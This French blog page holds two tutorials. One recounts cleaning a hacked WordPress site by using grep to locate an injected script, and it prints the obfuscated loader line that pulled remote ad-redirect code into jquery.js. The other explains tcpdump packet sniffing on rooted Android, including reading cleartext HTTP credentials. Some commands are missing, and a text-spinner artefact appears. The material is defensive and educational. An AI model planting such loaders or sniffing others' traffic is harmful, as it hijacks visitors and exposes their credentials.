Heureux de vous retrouver de nouveau ! Vous savez peut-être faire des recherches dans votre PC pour retrouver les fichiers qui se trouvent dans votre disque dur mais pas chercher les caractères qui se trouvent dans les fichiers de votre disques durs. Vous vous demanderiez peut-être c’est quoi l’intérêt de chercher ce qui se trouve dans un fichier… Ayez la réponse dans mon exemple simple.
Récemment, vous ne l’avez peut être pas remarqué mais ce blog (Informagenie) était piraté. Ce qui se faisait était que tous les visiteurs qui venait dans ce blog par biais (Referer) d’une autre site était redirigé dans un autre lien (a.c0594.com/?tz=1) diffusant des pubs.  Je croyais que c’était dû à l’hébergement gratuit. Mais en changeant d’hébergeur, ce comportement n’avait pas changé. Du coup j’ai perdu beaucoup de visiteurs venant des moteurs de recherches, des réseaux sociaux.

Un peu d’analyse (et des recherches) m’a emmené au script a.c0594.com/?js=1 et dans les codes s’écrivait dans la source document.writeln('<'+'scr'+'ipt type="text/javascript" src="https://a.c'+'0594.com/?js=1"></'+'scr'+'ipt>'); se trouvait forcement dans l’un de mes scripts WordPress. Alors ouvrir un par un  les fichiers (Des plugins, thèmes et cores) du blog (Plus de 100000 fichiers) avec des milieux de lignes de codes, vous savez comment ça gène ?

Aujourd’hui je vous parle d’un outil qui m’a récemment sauvé la vie. Une commande Linux grep qui vous sauvera peut aussi peut-être un jour la vie.

grep est un programme s’exécutant en ligne de commande et qui permet de faire des recherches (extraire, trier et filtrer) dans le fichier. C’est avec celui que j’ai enfin reconnu le but de l’informatique aux humanités (Éviter les travails répétitifs et fastidieux).

Grep sous Windows, Linux, Mac et Android

Le mieux est que vous pouvez utiliser la commande grep dans quasi tous les OS. Grep sst disponible dans tous ces plateforme. Je vous montre comment l’utiliser depuis Android pour la porté de tous mais pour Windows j’utilise mingw-w64, pour linux et Mac OS c’est déjà préinstallé et pour Android, installer terminal emulator et busybox.

Utilisation de grep

Je ne peux malheureusement pas ici vous faire le tours d’utilisation de cette commande. Je vous montre juste comment j’ai {fixé | règlé} le problème de redirection vers a.c0594.com/?j=1 sous wordpress et pour la suite, Ce tutoriel d’openclassrooms vous sera le plus complet et s’adaptera même dans Android.

Pour fixer mon problème, je me suis placé dans la racine de mes fichiers WordPress et j’ai exécuté la commande

  1. grep : La commande
  2. -r : est l’argument récursif qui veut dire, chercher dans tous les fichiers de tous les dossiers et les sous-dossiers
  3. 0594.com/?js=1” : est juste le caractère susceptible d’être dans l’un de ces fichiers

Et au bout d’environ 3 minutes j’ai eu le résultat complet. Le code malicieux se trouvait dans le fichier jquery.js dans le l’arborescence wp-include/js/jquery/jquery.js . C’était dans le cœur même du WordPress où je n’aurez même pas l’idée de commencer avec s’il fallait voir un à un les fichiers.

Aimeriez-vous vivre en live la fameuse histoire de Alice et Bob ? Vous verrez que ce n’est pas un monde imaginaire et que c’est assez réel. Ah, je vois d’autres Alice et Bob ne leurs dit absolument rien, alors que ce sont deux personnages illustratifs dans la cryptologie. C’est souvent utilisé pour montrer qu’à la conversion d’Alice et Bob, Eve (le pirateur) peut intercepter la conversation pour soit avoir les messages secrets, ou tout simplement pirater. C’est souvent représenter par cette illustration :

Capture reseau avec tcpdump

Ce que Alice et Bob font, c’est comme si vous visitiez, vous vous connectiez ou conversiez dans un site web quelconque mais ce que Eve fait, c’est ce qu’on a toujours tendance à se perdre car on ne sait pas comment peut-elle intercepter ces messages. Laissez moi vous apprendre aujourd’hui si vous ne le connaissez pas que Eve ne fait que le Sniffing ou en français L’analyse de paquets ou encore l’écoute du réseau.

Le sniffing est une technique consistant à faire les captures de chaque paquet d’une interface réseau. Sans pour autant aller trop loin, je veux vous montrer à faire cette manipulation sous Android.

Cela vous servira à des nombreuses choses telles que :

  • Faire les diagnostiques pour trouver un access à Internet gratuit
  • Diagnostiquer facilement votre connexion si vous avez des petits soucis
  • Aussi, ça permet que vous ne soyez pas plus dans le bleu du réseau et comprendre encore mieux comment fonctionne le réseau Informatique.

Assez dit, Je vous présente tcpdump, un petit programme qui va vous permettre de faire l’écoute d’un réseau.

Installation de Tcpdump

Pour installer tcpdump,

  1. Il faut que votre Android soit rooté
  2. Il faut avoir Terminal emulator
  3. Téléchargez tcpdump dernieres versions
  4. Mettez le fichier téléchargé dans /system/bin
  5. Et c’est fini.

Exécution de Tcpdump

Vous avez enfin terminé à installer tcpdump dans votre Android, maintenant c’est le moment de l’exécuter. Pour l’exécuter :

    1. Ouvrez Terminal Emulator
    2. Tapez pour avoir les droits Super Utilisateur
    3. Après, exécutez juste

tcpdump android.jpg

Je ne comprend rien de ce qui s’affiche

Pufff ! Je suis désolé pour ça mais je ne suis pas venu pour vous apprendre le cours de réseau car pour le comprendre, il faut avoir les notions sur le fonctionnement de chacun de protocole originaire de ces paquets mais par contre je vous présente un concept simple. Pour ceux qui se retrouve déjà dans le réseau, sachez juste ceci

  •  192.168.0.1.4562 > 41.77.220.60.80 équivaut à 192.168.0.1:4562 > 41.77.220.60:80, ce qui veut dire que 192.168.0.1 envoie les requêtes avec le port source 4562 vers 41.77.220.60 via le port 80. Ce qui veux tout simplement dire  que mon ordinateur essaye de se connecter dans 41.77.220.60 qui est l’adresse IP de moncompte.orange.cd

Le protocole FTP, Telnet et HTTP sont nuls

En maitrisant cet outil, sachez que si vous faites l’écoute de l’ensemble de réseau (On active le mode promiscuous pour la carte Ethernet et mode monitoring pour la carte WIFI), les protocoles précités ne seront que des technologies à ne pas utiliser si vous avez à faire à des données sensibles. Quand vous envoyez par exemple votre identifiant pour vous connecter dans un site web qui n’utilise que le protocole HTTP, Vos données s’affichent en claire dans l’écoute et c’est facile qu’on utilise vos données à des fins malveillants.

Pour afficher les données en claire, il faut activer le mode verbeuse comme suit

Comment les pirates piratent avec

Déjà dans une seconde 100 paquets peuvent vous afficher à l’écran, Alors on se pose des questions, Eve aura à lire lettre par lettre tout ça ? Non ! Un Informaticien ne peut jamais faire une telle chose. Ils utilisent les expressions régulières pour qu’ils puissent extraire ce qui leurs semblent intéressant. Comment ? ça ne les aurait même pas du temps. ils peuvent faire

Avec ce code, tous les paquets s’afficheront que dans le fichier mentionné et après c’est facile à filtrer avec un langage comme PERL en utilisant les REGEX ou en se servant des filtres proposés par tcpdump.

Informations supplémentaires

Pour plus d’Info sur l’outil, faites

Ou lisez le Man officielle.

A savoir qu’il existe aussi Wireshark qui est  aussi disponible sous Windows